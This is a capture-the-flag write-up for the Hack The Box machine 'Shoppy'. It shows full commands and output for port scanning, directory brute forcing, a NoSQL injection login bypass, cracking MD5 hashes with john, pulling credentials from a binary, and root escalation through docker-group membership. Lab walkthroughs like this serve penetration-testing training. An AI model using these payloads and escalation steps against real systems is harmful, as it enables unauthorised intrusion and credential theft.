In this post, I’m writing a write-up for the machine Shoppy from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Shoppy is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.
A port scan with Nmap shows two open ports. The first port is
22/tcp the default SSH port, and
80/tcp, the default HTTP port. On the last port is running a website which can be accessed through
ffuf, we can find the login form on the URL
http://shoppy.htb/login. This login form is vulnerable for NoSQL injection, and we can bypass the authentication and access the website.
Via the website, we can search for user accounts. Again, with a NoSQL payload in the search box, the results show the two user accounts
josh with their passwords. The password for the user account
josh is crackable with
john. After cracking his password we have to perform some enumeration in order to find the second website, running on
http://mattermost.shoppy.htb. Via Mattermost we find the credentials for the user account
jaeger which has the permission to access this machine via SSH. Through this SSH session we are able to read the
The user account
jaeger has permission to run
/home/deploy/password-manager as the user account
deploy. By doing a
cat on the program, we can read in the
code the password and use it to retrieve the credentials from the
creds.txt file, so we can access the user account
deploy via SSH access. Next,
deploy is a member of the group
docker. Through GTFObins we can exploit the membership of the
docker group for privilege escalation and we can read the
|Release Date:||17 Sep 2022|
As always we start this machine with a port scan with
1 2 ┌──(root💀kali)-[/home/kali/htb/machines/shoppy] └─# nmap -sC -sV -oA ./nmap/shoppy 10.10.11.180
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 18:25 EST Nmap scan report for 10.10.11.180 Host is up (0.026s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA) | 256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA) |_ 256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519) 80/tcp open http nginx 1.23.1 |_http-title: Did not follow redirect to http://shoppy.htb |_http-server-header: nginx/1.23.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.81 seconds
The port scan shows two open ports. The first discovered open port is
22/tcp this is the default SSH port. The second open port is
80/tcp this is the default HTTP port. The webserver is running on Nginx 1.23.1. According to the header, the webserver is listening on the hostname
shoppy.htb. To perform further reconnaissance, we add the hostname
shoppy.htb to our
We start with the enumeration of the website. We visit the website through the URL
This page is not showing any relevant data. Maybe, a directory brute force with
ffuf will show us more information.
1 2 ┌──(root💀kali)-[/home/kali/htb/machines/shoppy] └─# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://shoppy.htb/FUZZ
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.5.0 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://shoppy.htb/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ Admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 40ms] ADMIN [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 54ms] Login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 59ms] admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 44ms] assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 58ms] css [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 40ms] exports [Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 30ms] favicon.ico [Status: 200, Size: 213054, Words: 56, Lines: 89, Duration: 32ms] fonts [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 31ms] images [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 28ms] js [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 43ms] login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 46ms] :: Progress: [20469/20469] :: Job [1/1] :: 1031 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
Nice! We have found a login page on
http://shoppy.htb/login. To login, we need valid credentials. We do not currently have those credentials. Also, the location
http://shoppy.htb/exports is interessting, but we cannot extract any information from this URL right now, maybe later on in this machine.
If we are using a single quote (
') in the username field, we receive a
504 Gateway Time-out. We have our first error message. We need to perform some more enumeration. This part of the machine, was the most confusing part of this box. It took me some time to find out how to get a foothold on this machine.
The error message shows the URL
Let’s try various payloads in the login form. After a long time of trying, we are able to find the right payload to bypass the login mechanism through BurpSuite.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 POST /login HTTP/1.1 Host: shoppy.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://shoppy.htb Connection: close Referer: http://shoppy.htb/login Upgrade-Insecure-Requests: 1 username=admin'||'1==1//&password=toto
After logging in, we are redirected to
From this page, we can search for users. We can search for the user
admin, and received the password for this user account. We’ve tried to crack this password, but it seems it is uncrackable. After filling in the payload
'||'1==1// in the search bar (payload always trye), it shows all existing user accounts in the databse.
1 2 3 4 5 6 7 _id "62db0e93d6d6a999a66ee67a" username "admin" password "23c6877d9e2b564ef8b32c3a23de27b2" 1 _id "62db0e93d6d6a999a66ee67b" username "josh" password "6ebcea65320589ca4f2f1ce039975995"
Let’s try to crack the password of the useraccount
1 2 3 4 5 6 7 8 9 10 ┌──(root💀kali)-[/home/kali/htb/machines/shoppy] └─# john josh-admin --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status remembermethisway (?) 1g 0:00:00:00 DONE (2022-12-30 18:13) 14.28g/s 11602Kp/s 11602Kc/s 11602KC/s renato1989..reiji Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed.
We have found the password
remembermethisway. With this password I’ve tried to login through SSH with this password, but no luck. After enumerating around, we found an extra sub-domain
We cannot now login with the user
josh with the cracked password.
After looking around, we find the credentials for the user account
jaeger with the password
SSH access as jaeger
With this user account, we can access the machine through SSH and grab the user flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(root💀kali)-[/home/kali/htb/machines/shoppy] └─# ssh [email protected] 130 ⨯ [email protected]'s password: Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. jaeger@shoppy:~$ cat user.txt e1eba78fb74a4926a34f782861db141b
This user account has the permission to run
/home/deploy/password-manager on behalf of the user account
1 2 3 4 5 6 7 jaeger@shoppy:~$ sudo -l [sudo] password for jaeger: Matching Defaults entries for jaeger on shoppy: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jaeger may run the following commands on shoppy: (deploy) /home/deploy/password-manager
After executing this program, it’s asking for a master password. As we are able to run the program, we can also try to read the program.
1 2 3 4 5 jaeger@shoppy:~$ cat /home/deploy/password-manager ... H]UHH}u}u2}u)H=.Hu,H5.H+H/UH]AWL=W)AVIAUIATAUH-P)SL)HtLLDAHH9uA\A]A^A_Welcome to Josh password manager!Please enter your master passwor d: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !@0@h% ...
It seems that the password is:
1 2 3 4 5 6 7 jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager Welcome to Josh password manager! Please enter your master password: Sample Access granted! Here is creds ! Deploy Creds : username: deploy password: Deploying@pp!
Yes! We have now the credentials for the user account
deploy. We can switch to this user account and run
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jaeger@shoppy:~$ sudo -u deploy password for deploy: Deploying@pp! $ bash linpeas.sh ... Starting linpeas. Caching Writable Folders... ════════════════════════════════════╣ Basic information ╠════════════════════════════════════ OS: Linux version 5.10.0-18-amd64 ([email protected]) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.140-1 (2022-09-02) User & Groups: uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker) Hostname: shoppy Writable folder: /dev/shm [+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /usr/bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h) ...
The user account
deploy is in the
docker group. Through GTFObins we can find the path to privilege escalation.
1 2 3 4 $ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # cat /root/root.txt 85cba87d39cb93daa7d3009e17f2d08b #
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!
Happy Hacking :-)